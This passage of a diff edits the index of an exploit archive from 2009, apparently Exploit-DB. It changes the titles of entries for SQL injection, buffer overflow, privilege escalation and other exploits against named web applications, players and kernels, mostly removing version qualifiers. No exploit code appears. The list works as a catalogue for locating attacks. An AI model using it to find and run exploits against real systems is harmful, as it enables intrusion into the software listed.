Handling",2009-06-30,SirGod,php,webapps,0 9054,platforms/php/webapps/9054.txt,"WordPress Plugin Related Sites 2.1 - Blind SQL Injection",2009-06-30,eLwaux,php,webapps,0 -9055,platforms/php/webapps/9055.pl,"PunBB Affiliates Mod <= 1.1 - Remote Blind SQL Injection Exploit",2009-06-30,Dante90,php,webapps,0 -9056,platforms/php/webapps/9056.txt,"MDPro Module CWGuestBook <= 2.1 - Remote SQL Injection",2009-06-30,Dante90,php,webapps,0 -9057,platforms/php/webapps/9057.txt,"tsep <= 0.942.02 - Multiple Vulnerabilities",2009-06-30,eLwaux,php,webapps,0 -9058,platforms/php/webapps/9058.pl,"PunBB Extension Vote For Us <= 1.0.1 - Blind SQL Injection Exploit",2009-06-30,Dante90,php,webapps,0 +9055,platforms/php/webapps/9055.pl,"PunBB Affiliates Mod 1.1 - Remote Blind SQL Injection Exploit",2009-06-30,Dante90,php,webapps,0 +9056,platforms/php/webapps/9056.txt,"MDPro Module CWGuestBook 2.1 - SQL Injection",2009-06-30,Dante90,php,webapps,0 +9057,platforms/php/webapps/9057.txt,"tsep 0.942.02 - Multiple Vulnerabilities",2009-06-30,eLwaux,php,webapps,0 +9058,platforms/php/webapps/9058.pl,"PunBB Extension Vote For Us 1.0.1 - Blind SQL Injection Exploit",2009-06-30,Dante90,php,webapps,0 9059,platforms/php/webapps/9059.htm,"Messages Library 2.0 - Arbitrary Administrator Account",2009-06-30,"ThE g0bL!N",php,webapps,0 9060,platforms/windows/local/9060.pl,"MP3-Nator 2.0 - (.plf) Universal Buffer Overflow Exploit (SEH)",2009-07-01,"ThE g0bL!N",windows,local,0 9061,platforms/windows/dos/9061.pl,"PEamp 1.02b - (.M3U) Local Buffer Overflow PoC",2009-07-01,"ThE g0bL!N",windows,dos,0 @@ -8550,49 +8550,49 @@ id,file,description,date,author,platform,type,port 9065,platforms/windows/remote/9065.c,"Green Dam Remote Change System Time Exploit",2009-07-01,"Anti GD",windows,remote,0 9066,platforms/hardware/remote/9066.txt,"ARD-9808 DVR Card Security Camera - Arbitrary Config Disclosure",2009-07-01,Septemb0x,hardware,remote,0 9067,platforms/hardware/dos/9067.py,"ARD-9808 DVR Card Security Camera (GET Request) Remote DoS Exploit",2009-07-01,Stack,hardware,dos,0 -9068,platforms/php/webapps/9068.txt,"kervinet forum <= 1.1 - Multiple Vulnerabilities",2009-07-01,eLwaux,php,webapps,0 -9069,platforms/php/webapps/9069.txt,"cms chainuk <= 1.2 - Multiple Vulnerabilities",2009-07-01,eLwaux,php,webapps,0 +9068,platforms/php/webapps/9068.txt,"kervinet forum 1.1 - Multiple Vulnerabilities",2009-07-01,eLwaux,php,webapps,0 +9069,platforms/php/webapps/9069.txt,"cms chainuk 1.2 - Multiple Vulnerabilities",2009-07-01,eLwaux,php,webapps,0 9070,platforms/windows/local/9070.pl,"AudioPLUS 2.00.215 - (.pls) Local Buffer Overflow Exploit (SEH)",2009-07-01,Stack,windows,local,0 9071,platforms/multiple/dos/9071.txt,"Apple Safari 4.x JavaScript Reload Remote Crash Exploit",2009-07-02,SkyOut,multiple,dos,0 9072,platforms/multiple/local/9072.txt,"Oracle 10g - SYS.LT.COMPRESSWORKSPACETREE SQL Injection Exploit (2)",2009-07-02,"Sumit Siddharth",multiple,local,0 -9073,platforms/php/webapps/9073.php,"YourTube <= 2.0 - Arbitrary Database Disclosure Exploit",2009-07-02,"Security Code Team",php,webapps,0 +9073,platforms/php/webapps/9073.php,"YourTube 2.0 - Arbitrary Database Disclosure Exploit",2009-07-02,"Security Code Team",php,webapps,0 9074,platforms/cgi/webapps/9074.txt,"Sourcefire 3D Sensor & Defense Center 4.8.x - Privilege Escalation",2009-07-02,"Gregory Duchemin",cgi,webapps,0 9075,platforms/php/webapps/9075.txt,"AdminLog 0.5 - (valid_login) Authentication Bypass",2009-07-02,SirGod,php,webapps,0 9076,platforms/php/webapps/9076.php,"Almnzm 2.0 - Remote Blind SQL Injection Exploit",2009-07-02,Qabandi,php,webapps,0 9077,platforms/php/webapps/9077.txt,"conpresso 3.4.8 - (detail.php) Remote Blind SQL Injection",2009-07-02,tmh,php,webapps,0 -9079,platforms/php/webapps/9079.txt,"Opial 1.0 - (Auth Bypass) Remote SQL Injection",2009-07-02,Moudi,php,webapps,0 -9080,platforms/php/webapps/9080.txt,"Opial 1.0 - (albumid) Remote SQL Injection",2009-07-02,"ThE g0bL!N",php,webapps,0 -9081,platforms/php/webapps/9081.txt,"Rentventory Multiple Remote SQL Injection Vulnerabilities",2009-07-02,Moudi,php,webapps,0 +9079,platforms/php/webapps/9079.txt,"Opial 1.0 - (Auth Bypass) SQL Injection",2009-07-02,Moudi,php,webapps,0 +9080,platforms/php/webapps/9080.txt,"Opial 1.0 - (albumid) SQL Injection",2009-07-02,"ThE g0bL!N",php,webapps,0 +9081,platforms/php/webapps/9081.txt,"Rentventory Multiple SQL Injection Vulnerabilities",2009-07-02,Moudi,php,webapps,0 9082,platforms/freebsd/local/9082.c,"FreeBSD 7.0/7.1 vfs.usermount - Local Privilege Escalation Exploit",2009-07-09,"Patroklos Argyroudis",freebsd,local,0 -9083,platforms/linux/local/9083.c,"Linux Kernel <= 2.6.24_16-23 / <= 2.6.28.3 (Ubuntu 8.04/8.10 / Fedora Core 10 x86_64) - set_selection() UTF-8 Off By One Local Exploit",2009-07-09,sgrakkyu,linux,local,0 +9083,platforms/linux/local/9083.c,"Linux Kernel 2.6.24_16-23 / <= 2.6.28.3 (Ubuntu 8.04/8.10 / Fedora Core 10 x86_64) - set_selection() UTF-8 Off By One Local Exploit",2009-07-09,sgrakkyu,linux,local,0 9084,platforms/windows/dos/9084.txt,"Soulseek 157 NS < 13e/156.x - Remote Peer Search Code Execution PoC",2009-07-09,"laurent gaffié ",windows,dos,0 -9085,platforms/multiple/dos/9085.txt,"MySQL <= 5.0.45 = COM_CREATE_DB Format String PoC (Auth)",2009-07-09,kingcope,multiple,dos,0 +9085,platforms/multiple/dos/9085.txt,"MySQL 5.0.45 = COM_CREATE_DB Format String PoC (Auth)",2009-07-09,kingcope,multiple,dos,0 9086,platforms/php/webapps/9086.txt,"MRCGIGUY Thumbnail Gallery Post 1b Arb. Shell Upload",2009-07-09,"ThE g0bL!N",php,webapps,0 9087,platforms/php/webapps/9087.php,"Nwahy Dir 2.1 - Arbitrary Change Admin Password Exploit",2009-07-09,rEcruit,php,webapps,0 -9088,platforms/php/webapps/9088.txt,"Glossword <= 1.8.11 - Arbitrary Uninstall / Install",2009-07-09,Evil-Cod3r,php,webapps,0 +9088,platforms/php/webapps/9088.txt,"Glossword 1.8.11 - Arbitrary Uninstall / Install",2009-07-09,Evil-Cod3r,php,webapps,0 9089,platforms/php/webapps/9089.txt,"ClearContent - (image.php url) RFI/LFI",2009-07-09,MizoZ,php,webapps,0 9090,platforms/windows/dos/9090.pl,"otsAV DJ 1.85.064 - (.ofl) Local Heap Overflow PoC",2009-07-09,hack4love,windows,dos,0 9091,platforms/php/webapps/9091.php,"Mlffat 2.2 - Remote Blind SQL Injection Exploit",2009-07-09,Qabandi,php,webapps,0 9092,platforms/php/webapps/9092.txt,"webasyst shop-script - (bSQL/XSS) Multiple Vulnerabilities",2009-07-09,Vrs-hCk,php,webapps,0 9093,platforms/windows/remote/9093.txt,"windows live messenger plus! fileserver 1.0 - Directory Traversal",2009-07-09,joepie91,windows,remote,0 -9094,platforms/php/webapps/9094.txt,"EasyVillaRentalSite (Id) Remote SQL Injection",2009-07-09,BazOka-HaCkEr,php,webapps,0 +9094,platforms/php/webapps/9094.txt,"EasyVillaRentalSite (Id) SQL Injection",2009-07-09,BazOka-HaCkEr,php,webapps,0 9095,platforms/php/webapps/9095.txt,"talkback 2.3.14 - Multiple Vulnerabilities",2009-07-09,JIKO,php,webapps,0 9096,platforms/windows/remote/9096.txt,"Sun One WebServer 6.1 JSP Source Viewing",2009-07-09,kingcope,windows,remote,0 9097,platforms/multiple/local/9097.txt,"xscreensaver 5.01 - Arbitrary File Disclosure Symlink Attack",2009-07-09,kingcope,multiple,local,0 9098,platforms/php/webapps/9098.txt,"Siteframe CMS 3.2.x - (SQL Injection/phpinfo()) Multiple Vulnerabilities",2009-07-09,NoGe,php,webapps,0 -9099,platforms/php/webapps/9099.pl,"Universe CMS 1.0.6 - (vnews.php id) Remote SQL Injection Exploit",2009-07-09,Mr.tro0oqy,php,webapps,0 +9099,platforms/php/webapps/9099.pl,"Universe CMS 1.0.6 - (vnews.php id) SQL Injection Exploit",2009-07-09,Mr.tro0oqy,php,webapps,0 9100,platforms/windows/dos/9100.html,"Microsoft Internet Explorer (AddFavorite) Remote Crash PoC",2009-07-09,Sberry,windows,dos,0 9101,platforms/php/webapps/9101.txt,"phpbms 0.96 - Multiple Vulnerabilities",2009-07-10,eLwaux,php,webapps,0 9102,platforms/windows/dos/9102.pl,"PatPlayer 3.9 - (.M3U) Local Heap Overflow PoC",2009-07-10,Cyber-Zone,windows,dos,0 9103,platforms/php/webapps/9103.txt,"gencms 2006 - Multiple Vulnerabilities",2009-07-10,eLwaux,php,webapps,0 -9104,platforms/windows/local/9104.py,"Photo DVD Maker Pro <= 8.02 - (.pdm) Local BoF Exploit (SEH)",2009-07-10,His0k4,windows,local,0 -9105,platforms/php/webapps/9105.txt,"MyMsg 1.0.3 - (uid) Remote SQL Injection",2009-07-10,Monster-Dz,php,webapps,0 +9104,platforms/windows/local/9104.py,"Photo DVD Maker Pro 8.02 - (.pdm) Local BoF Exploit (SEH)",2009-07-10,His0k4,windows,local,0 +9105,platforms/php/webapps/9105.txt,"MyMsg 1.0.3 - (uid) SQL Injection",2009-07-10,Monster-Dz,php,webapps,0 9106,platforms/windows/remote/9106.txt,"citrix xencenterweb - (XSS/SQL/RCE) Multiple Vulnerabilities",2009-07-10,"Secure Network",windows,remote,0 9107,platforms/php/webapps/9107.txt,"Phenotype CMS 2.8 - (login.php user) Blind SQL Injection",2009-07-10,"Khashayar Fereidani",php,webapps,0 9108,platforms/windows/remote/9108.py,"Microsoft Internet Explorer 7 Video ActiveX Remote Buffer Overflow Exploit",2009-07-10,"David Kennedy (ReL1K)",windows,remote,0 9109,platforms/php/webapps/9109.txt,"ToyLog 0.1 - SQL Injection/RCE Exploit",2009-07-10,darkjoker,php,webapps,0 9110,platforms/php/webapps/9110.txt,"WordPress - Privileges Unchecked in admin.php and Multiple Information",2009-07-10,"Core Security",php,webapps,0 -9111,platforms/php/webapps/9111.txt,"Jobbr 2.2.7 - Multiple Remote SQL Injection Vulnerabilities",2009-07-10,Moudi,php,webapps,0 +9111,platforms/php/webapps/9111.txt,"Jobbr 2.2.7 - Multiple SQL Injection Vulnerabilities",2009-07-10,Moudi,php,webapps,0 9112,platforms/php/webapps/9112.txt,"Joomla Component com_propertylab - (auction_id) SQL Injection",2009-07-10,"Chip d3 bi0s",php,webapps,0 9113,platforms/windows/dos/9113.txt,"OtsAv DJ/TV/Radio Multiple Local Heap Overflow PoCs",2009-07-10,Stack,windows,dos,0 9114,platforms/windows/dos/9114.txt,"eEye Retina WiFi Security Scanner 1.0 - (.rws Parsing) Buffer Overflow PoC",2009-07-10,LiquidWorm,windows,dos,0 @@ -8601,7 +8601,7 @@ id,file,description,date,author,platform,type,port 9117,platforms/hardware/remote/9117.txt,"HTC / Windows Mobile OBEX FTP Service - Directory Traversal",2009-07-10,"Alberto Tablado",hardware,remote,0 9118,platforms/php/webapps/9118.txt,"ebay clone 2009 - (XSS/bSQL) Multiple Vulnerabilities",2009-07-10,Moudi,php,webapps,0 9119,platforms/php/webapps/9119.txt,"LionWiki (index.php page) Local File Inclusion",2009-07-10,MoDaMeR,php,webapps,0 -9121,platforms/php/webapps/9121.php,"Morcego CMS <= 1.7.6 - Remote Blind SQL Injection Exploit",2009-07-10,darkjoker,php,webapps,0 +9121,platforms/php/webapps/9121.php,"Morcego CMS 1.7.6 - Remote Blind SQL Injection Exploit",2009-07-10,darkjoker,php,webapps,0 9122,platforms/php/webapps/9122.txt,"Opial 1.0 - Arbitrary File Upload/XSS/SQL Injection Vulnerabilities",2009-07-11,LMaster,php,webapps,0 9123,platforms/windows/dos/9123.pl,"M3U/M3L to ASX/WPL 1.1 - (ASX & M3U & M3L) Local BoF PoC",2009-07-11,"ThE g0bL!N",windows,dos,0 9124,platforms/windows/dos/9124.pl,"Playlistmaker 1.5 - (.M3U/M3L/TXT) Local Stack Overflow PoC",2009-07-11,"ThE g0bL!N",windows,dos,0 @@ -8612,10 +8612,10 @@ id,file,description,date,author,platform,type,port 9129,platforms/php/webapps/9129.txt,"censura 1.16.04 - (bSQL/XSS) Multiple Vulnerabilities",2009-07-12,Vrs-hCk,php,webapps,0 9130,platforms/php/webapps/9130.txt,"Php AdminPanel Free 1.0.5 - Remote File Disclosure",2009-07-12,"Khashayar Fereidani",php,webapps,0 9131,platforms/windows/dos/9131.py,"Tandberg MXP F7.0 - (USER) Remote Buffer Overflow PoC",2009-07-13,otokoyama,windows,dos,0 -9132,platforms/php/webapps/9132.py,"RunCMS <= 1.6.3 - (double ext) Remote Shell Injection Exploit",2009-07-13,StAkeR,php,webapps,0 +9132,platforms/php/webapps/9132.py,"RunCMS 1.6.3 - (double ext) Remote Shell Injection Exploit",2009-07-13,StAkeR,php,webapps,0 9133,platforms/windows/dos/9133.pl,"ScITE Editor 1.72 - Local Crash Exploit",2009-07-13,prodigy,windows,dos,0 9134,platforms/freebsd/dos/9134.c,"FreeBSD 6/8 - (ata device) Local Denial of Service Exploit",2009-07-13,"Shaun Colley",freebsd,dos,0 -9135,platforms/linux/local/9135.sh,"Openswan <= 2.4.12/2.6.16 Insecure Temp File Creation Root Exploit",2009-07-13,nofame,linux,local,0 +9135,platforms/linux/local/9135.sh,"Openswan 2.4.12/2.6.16 Insecure Temp File Creation Root Exploit",2009-07-13,nofame,linux,local,0 9136,platforms/windows/local/9136.pl,"Mp3-Nator 2.0 - (ListData.dat) Universal Buffer Overflow Exploit (SEH)",2009-07-13,"ThE g0bL!N",windows,local,0 9137,platforms/windows/remote/9137.html,"Mozilla Firefox 3.5 - (Font tags) Remote Buffer Overflow Exploit",2009-07-13,Sberry,windows,remote,0 9138,platforms/php/webapps/9138.txt,"onepound shop 1.x products.php SQL Injection",2009-07-13,Affix,php,webapps,0 @@ -8630,22 +8630,22 @@ id,file,description,date,author,platform,type,port 9147,platforms/windows/dos/9147.pl,"MixVibes Pro 7.043 - (.vib) Local Stack Overflow PoC",2009-07-14,hack4love,windows,dos,0 9148,platforms/windows/local/9148.py,"Live For Speed 2 Version Z - (.mpr) Buffer Overflow Exploit (SEH)",2009-07-14,His0k4,windows,local,0 9149,platforms/windows/local/9149.pl,"Icarus 2.0 - (.ICP) Local Buffer Overflow Exploit (SEH)",2009-07-15,hack4love,windows,local,0 -9150,platforms/php/webapps/9150.txt,"WordPress Plugin My Category Order <= 2.8 - SQL Injection",2009-07-15,"Manh Luat",php,webapps,0 -9151,platforms/php/webapps/9151.txt,"ILIAS Lms <= 3.9.9/3.10.7 - Arbitrary Edition/Info Disclosure Vulnerabilities",2009-07-15,YEnH4ckEr,php,webapps,0 +9150,platforms/php/webapps/9150.txt,"WordPress Plugin My Category Order 2.8 - SQL Injection",2009-07-15,"Manh Luat",php,webapps,0 +9151,platforms/php/webapps/9151.txt,"ILIAS Lms 3.9.9/3.10.7 - Arbitrary Edition/Info Disclosure Vulnerabilities",2009-07-15,YEnH4ckEr,php,webapps,0 9152,platforms/windows/local/9152.pl,"AudioPLUS 2.00.215 - (.m3u .lst) Universal SEH Overwrite Exploit",2009-07-15,Stack,windows,local,0 9153,platforms/php/webapps/9153.txt,"Admin News Tools 2.5 - (fichier) Remote File Disclosure",2009-07-15,Securitylab.ir,php,webapps,0 9154,platforms/php/webapps/9154.js,"ZenPhoto 1.2.5 Completely Blind SQL Injection Exploit",2009-07-15,petros,php,webapps,0 -9155,platforms/php/webapps/9155.txt,"PHPGenealogy 2.0 - (DataDirectory) RFI",2009-07-15,"Khashayar Fereidani",php,webapps,0 +9155,platforms/php/webapps/9155.txt,"PHPGenealogy 2.0 - (DataDirectory) Remote File Inclusion",2009-07-15,"Khashayar Fereidani",php,webapps,0 9156,platforms/php/webapps/9156.py,"Greenwood Content Manager 0.3.2 - Local File Inclusion Exploit",2009-07-15,"Khashayar Fereidani",php,webapps,0 9157,platforms/windows/dos/9157.pl,"Hamster Audio Player 0.3a - Local Buffer Overflow PoC",2009-07-15,"ThE g0bL!N",windows,dos,0 9158,platforms/windows/dos/9158.html,"Mozilla Firefox 3.5 unicode Remote Buffer Overflow PoC",2009-07-15,"Andrew Haynes",windows,dos,0 -9159,platforms/php/webapps/9159.php,"Infinity <= 2.0.5 - Arbitrary Create Admin Exploit",2009-07-15,Qabandi,php,webapps,0 +9159,platforms/php/webapps/9159.php,"Infinity 2.0.5 - Arbitrary Create Admin Exploit",2009-07-15,Qabandi,php,webapps,0 9160,platforms/multiple/dos/9160.txt,"Multiple Web Browsers Denial of Service Exploit (1 bug to rule them all)",2009-07-15,"Thierry Zoller",multiple,dos,0 9161,platforms/php/webapps/9161.txt,"Admin News Tools Remote Contents Change",2009-07-15,Securitylab.ir,php,webapps,0 9162,platforms/php/webapps/9162.txt,"WebLeague 2.2.0 - (profile.php) SQL Injection",2009-07-15,Arka69,php,webapps,0 9163,platforms/windows/dos/9163.txt,"Microsoft Office Web Components (Spreadsheet) ActiveX BoF PoC",2009-07-16,anonymous,windows,dos,0 9164,platforms/php/webapps/9164.txt,"webLeague 2.2.0 - (install.php) Remote Change Password Exploit",2009-07-16,TiGeR-Dz,php,webapps,0 -9165,platforms/php/webapps/9165.pl,"webLeague 2.2.0 - (Auth Bypass) Remote SQL Injection Exploit",2009-07-16,ka0x,php,webapps,0 +9165,platforms/php/webapps/9165.pl,"webLeague 2.2.0 - (Auth Bypass) SQL Injection Exploit",2009-07-16,ka0x,php,webapps,0 9166,platforms/php/webapps/9166.txt,"ZenPhoto Gallery 1.2.5 Admin Password Reset (CRSF)",2009-07-16,petros,php,webapps,0 9167,platforms/windows/dos/9167.txt,"Music Tag Editor 1.61 build 212 - Remote Buffer Overflow PoC",2009-07-16,LiquidWorm,windows,dos,0 9168,platforms/windows/dos/9168.pl,"Zortam MP3 Player 1.50 - (m3u) Integer Division by Zero Exploit",2009-07-16,LiquidWorm,windows,dos,0 @@ -8667,12 +8667,12 @@ id,file,description,date,author,platform,type,port 9184,platforms/php/webapps/9184.txt,"Ger Versluis 2000 5.5 24 SITE_fiche.php SQL Injection",2009-07-17,DeCo017,php,webapps,0 9185,platforms/php/webapps/9185.txt,"good/bad vote - (XSS/LFI) Multiple Vulnerabilities",2009-07-17,Moudi,php,webapps,0 9186,platforms/windows/local/9186.pl,"Easy RM to MP3 Converter - (.m3u) Universal Stack Overflow Exploit",2009-07-17,Stack,windows,local,0 -9187,platforms/php/webapps/9187.txt,"Joomla Component Jobline <= 1.3.1 - Blind SQL Injection",2009-07-17,ManhLuat93,php,webapps,0 +9187,platforms/php/webapps/9187.txt,"Joomla Component Jobline 1.3.1 - Blind SQL Injection",2009-07-17,ManhLuat93,php,webapps,0 9189,platforms/windows/dos/9189.pl,"Streaming Audio Player 0.9 - (skin) Local Stack Overflow PoC (SEH)",2009-07-17,"ThE g0bL!N",windows,dos,0 9190,platforms/windows/local/9190.pl,"htmldoc 1.8.27.1 - (.html) Universal Stack Overflow Exploit",2009-07-17,ksa04,windows,local,0 9191,platforms/linux/local/9191.txt,"Linux Kernel 2.6.30 <= 2.6.30.1 / SELinux (RHEL5) - Kernel Local Root Exploit (0Day)",2009-07-17,spender,linux,local,0 9192,platforms/windows/dos/9192.pl,"Soritong MP3 Player 1.0 - (SKIN) Local Stack Overflow PoC (SEH)",2009-07-17,"ThE g0bL!N",windows,dos,0 -9193,platforms/php/webapps/9193.pl,"WebVision 2.1 - (news.php n) Remote SQL Injection Exploit",2009-07-17,Mr.tro0oqy,php,webapps,0 +9193,platforms/php/webapps/9193.pl,"WebVision 2.1 - (news.php n) SQL Injection Exploit",2009-07-17,Mr.tro0oqy,php,webapps,0 9194,platforms/php/webapps/9194.txt,"radbids gold 4.0 - Multiple Vulnerabilities",2009-07-17,Moudi,php,webapps,0 9195,platforms/php/webapps/9195.txt,"radlance gold 7.5 - Multiple Vulnerabilities",2009-07-17,Moudi,php,webapps,0 9196,platforms/php/webapps/9196.txt,"radnics gold 5.0 - Multiple Vulnerabilities",2009-07-17,Moudi,php,webapps,0 @@ -8687,7 +8687,7 @@ id,file,description,date,author,platform,type,port 9207,platforms/linux/local/9207.sh,"PulseAudio setuid - Local Privilege Escalation Exploit",2009-07-20,anonymous,linux,local,0 9208,platforms/linux/local/9208.txt,"PulseAudio setuid (Ubuntu 9.04 / Slackware 12.2.0) - Local Privilege Escalation",2009-07-20,anonymous,linux,local,0 9209,platforms/hardware/remote/9209.txt,"DD-WRT - (httpd service) Remote Command Execution",2009-07-20,gat3way,hardware,remote,0 -9211,platforms/php/webapps/9211.txt,"Alibaba-clone CMS - (SQL/bSQL) Remote SQL Injection Vulnerabilities",2009-07-20,"599eme Man",php,webapps,0 +9211,platforms/php/webapps/9211.txt,"Alibaba-clone CMS - (SQL/bSQL) SQL Injection Vulnerabilities",2009-07-20,"599eme Man",php,webapps,0 9212,platforms/windows/dos/9212.pl,"Acoustica MP3 Audio Mixer 2.471 - (.sgp) Crash Exploit",2009-07-20,prodigy,windows,dos,0 9213,platforms/windows/dos/9213.pl,"Acoustica MP3 Audio Mixer 2.471 - (.m3u) Local Heap Overflow PoC",2009-07-20,"D3V!L FUCK3R",windows,dos,0 9214,platforms/windows/remote/9214.pl,"Mozilla Firefox 3.5 - (Font tags) Remote Heap Spray Exploit (Perl)",2009-07-20,netsoul,windows,remote,0 @@ -8695,7 +8695,7 @@ id,file,description,date,author,platform,type,port 9216,platforms/windows/local/9216.pl,"Soritong MP3 Player 1.0 - (SKIN) Local Stack Overflow Exploit (SEH)",2009-07-20,SkuLL-HackeR,windows,local,0 9217,platforms/php/webapps/9217.txt,"E-Xoopport 3.1 Module MyAnnonces (lid) SQL Injection",2009-07-20,Vrs-hCk,php,webapps,0 9219,platforms/php/webapps/9219.txt,"powerUpload 2.4 - (Auth Bypass) Insecure Cookie Handling",2009-07-20,InjEctOr5,php,webapps,0 -9220,platforms/windows/dos/9220.pl,"KMplayer <= 2.9.4.1433 - (.srt) Local Buffer Overflow PoC",2009-07-20,b3hz4d,windows,dos,0 +9220,platforms/windows/dos/9220.pl,"KMplayer 2.9.4.1433 - (.srt) Local Buffer Overflow PoC",2009-07-20,b3hz4d,windows,dos,0 9221,platforms/windows/local/9221.pl,"WINMOD 1.4 - (.lst) Local Buffer Overflow Exploit (SEH)",2009-07-21,hack4love,windows,local,0 9222,platforms/windows/dos/9222.cpp,"FlyHelp - (.CHM) Local Buffer Overflow PoC",2009-07-21,"fl0 fl0w",windows,dos,0 9223,platforms/windows/local/9223.txt,"Adobe Acrobat 9.1.2 NOS - Local Privilege Escalation Exploit",2009-07-21,"Jeremy Brown",windows,local,0 @@ -8705,7 +8705,7 @@ id,file,description,date,author,platform,type,port 9227,platforms/php/webapps/9227.txt,"Meta Search Engine Script - (url) Local File Disclosure",2009-07-21,Moudi,php,webapps,0 9228,platforms/windows/dos/9228.pl,"otsAV 1.77.001 - (.ofl) Local Heap Overflow PoC",2009-07-22,hack4love,windows,dos,0 9229,platforms/windows/local/9229.py,"WINMOD 1.4 - (.lst) Universal Buffer Overflow Exploit (SEH) (2)",2009-07-22,Dz_Girl,windows,local,0 -9231,platforms/php/webapps/9231.txt,"Phorum <= 5.2.11 Permanent Cross-Site Scripting Vulnerabilities",2009-07-22,Crashfr,php,webapps,0 +9231,platforms/php/webapps/9231.txt,"Phorum 5.2.11 Permanent Cross-Site Scripting Vulnerabilities",2009-07-22,Crashfr,php,webapps,0 9234,platforms/windows/local/9234.pl,"WINMOD 1.4 - (.lst) Local Stack Overflow Exploit",2009-07-23,"CWH Underground",windows,local,0 9235,platforms/php/webapps/9235.php,"e107 Plugin my_gallery 2.4.1 readfile() Local File Disclosure Exploit",2009-07-23,NoGe,php,webapps,0 9236,platforms/php/webapps/9236.txt,"GLinks 2.1 - (cat) Remote Blind SQL Injection",2009-07-23,"599eme Man",php,webapps,0 @@ -8714,7 +8714,7 @@ id,file,description,date,author,platform,type,port 9239,platforms/php/webapps/9239.txt,"PHP Melody 1.5.3 - Remote File Upload Injection",2009-07-23,"Chip d3 bi0s",php,webapps,0 9240,platforms/windows/dos/9240.py,"OpenH323 Opal SIP Protocol Remote Denial of Service Exploit",2009-07-24,"Jose Miguel Esparza",windows,dos,0 9241,platforms/windows/dos/9241.py,"Ekiga 2.0.5 - (GetHostAddress) Remote Denial of Service Exploit",2009-07-24,"Jose Miguel Esparza",windows,dos,0 -9242,platforms/windows/dos/9242.py,"WzdFTPD <= 8.0 - Remote Denial of Service Exploit",2009-07-24,"Jose Miguel Esparza",windows,dos,0 +9242,platforms/windows/dos/9242.py,"WzdFTPD 8.0 - Remote Denial of Service Exploit",2009-07-24,"Jose Miguel Esparza",windows,dos,0 9243,platforms/php/webapps/9243.txt,"Million-Dollar Pixel Ads Platinum - (SQL/XSS) Multiple Vulnerabilities",2009-07-24,Moudi,php,webapps,0 9244,platforms/php/webapps/9244.txt,"Joomla Extension UIajaxIM 1.1 JavaScript Execution",2009-07-24,"599eme Man",php,webapps,0 9245,platforms/php/webapps/9245.pl,"PHP Live! 3.2.1/2 - (x) Remote Blind SQL Injection Exploit",2009-07-24,skys,php,webapps,0 @@ -8726,8 +8726,8 @@ id,file,description,date,author,platform,type,port 9251,platforms/php/webapps/9251.txt,"Deonixscripts Templates Management 1.3 - SQL Injection",2009-07-24,d3b4g,php,webapps,0 9252,platforms/php/webapps/9252.txt,"Scripteen Free Image Hosting Script 2.3 - SQL Injection Exploit",2009-07-24,Coksnuss,php,webapps,0 9253,platforms/windows/dos/9253.html,"Microsoft Internet Explorer 7/8 findText Unicode Parsing Crash Exploit",2009-07-24,Hong10,windows,dos,0 -9254,platforms/php/webapps/9254.txt,"PHP Live! <= 3.2.2 - (questid) Remote SQL Injection (2)",2009-07-24,skys,php,webapps,0 -9255,platforms/php/webapps/9255.txt,"Clip Bucket <= 1.7.1 Insecure Cookie Handling",2009-07-24,Qabandi,php,webapps,0 +9254,platforms/php/webapps/9254.txt,"PHP Live! <= 3.2.2 - (questid) SQL Injection (2)",2009-07-24,skys,php,webapps,0 +9255,platforms/php/webapps/9255.txt,"Clip Bucket 1.7.1 Insecure Cookie Handling",2009-07-24,Qabandi,php,webapps,0 9256,platforms/php/webapps/9256.txt,"Scripteen Free Image Hosting Script 2.3 - Insecure Cookie Handling",2009-07-24,Qabandi,php,webapps,0 9257,platforms/php/webapps/9257.php,"Pixaria Gallery 2.3.5 - (file) Remote File Disclosure Exploit",2009-07-24,Qabandi,php,webapps,0 9258,platforms/php/webapps/9258.txt,"Joomla Almond Classifieds 7.5 - (com_aclassf) Multiple Vulnerabilities",2009-07-27,Moudi,php,webapps,0 @@ -8735,32 +8735,32 @@ id,file,description,date,author,platform,type,port 9260,platforms/php/webapps/9260.txt,"skadate dating - (RFI/LFI/XSS) Multiple Vulnerabilities",2009-07-27,Moudi,php,webapps,0 9261,platforms/php/webapps/9261.txt,"xoops celepar module qas - (bSQL/XSS) Multiple Vulnerabilities",2009-07-27,Moudi,php,webapps,0 9262,platforms/php/webapps/9262.txt,"garagesalesjunkie - (SQL/XSS) Multiple Vulnerabilities",2009-07-27,Moudi,php,webapps,0 -9263,platforms/php/webapps/9263.txt,"URA 3.0 - (cat) Remote SQL Injection",2009-07-27,"Chip d3 bi0s",php,webapps,0 -9264,platforms/linux/dos/9264.py,"stftp <= 1.10 - (PWD Response) Remote Stack Overflow PoC",2009-07-27,sqlevil,linux,dos,0 +9263,platforms/php/webapps/9263.txt,"URA 3.0 - (cat) SQL Injection",2009-07-27,"Chip d3 bi0s",php,webapps,0 +9264,platforms/linux/dos/9264.py,"stftp 1.10 - (PWD Response) Remote Stack Overflow PoC",2009-07-27,sqlevil,linux,dos,0 9265,platforms/linux/dos/9265.c,"ISC DHCP dhclient < 3.1.2p1 - Remote Buffer Overflow PoC",2009-07-27,"Jon Oberheide",linux,dos,0 9266,platforms/php/webapps/9266.txt,"iwiccle 1.01 - (LFI/SQL) Multiple Vulnerabilities",2009-07-27,SirGod,php,webapps,0 9267,platforms/php/webapps/9267.txt,"VS PANEL 7.5.5 - (Cat_ID) SQL Injection (patched?)",2009-07-27,octopos,php,webapps,0 9268,platforms/hardware/dos/9268.rb,"Cisco WLC 4402 - Basic Auth Remote Denial of Service (Metasploit)",2009-07-27,"Christoph Bott",hardware,dos,0 9269,platforms/php/webapps/9269.txt,"PHP Paid 4 Mail Script - (home.php page) Remote File Inclusion",2009-07-27,int_main();,php,webapps,0 9270,platforms/php/webapps/9270.txt,"Super Mod System 3.0 - (s) SQL Injection",2009-07-27,MizoZ,php,webapps,0 -9271,platforms/php/webapps/9271.txt,"Inout Adserver (id) Remote SQL Injection",2009-07-27,boom3rang,php,webapps,0 +9271,platforms/php/webapps/9271.txt,"Inout Adserver (id) SQL Injection",2009-07-27,boom3rang,php,webapps,0 9272,platforms/windows/local/9272.py,"Adobe Acrobat 9.1.2 NOS - Local Privilege Escalation Exploit (Python)",2009-07-27,Dr_IDE,windows,local,0 9273,platforms/php/webapps/9273.php,"Allomani Mobile 2.5 - Remote Blind SQL Injection Exploit",2009-07-27,Qabandi,php,webapps,0 9274,platforms/php/webapps/9274.php,"Allomani Songs & Clips 2.7.0 - Blind SQL Injection Exploit",2009-07-27,Qabandi,php,webapps,0 9275,platforms/php/webapps/9275.php,"Allomani Movies & Clips 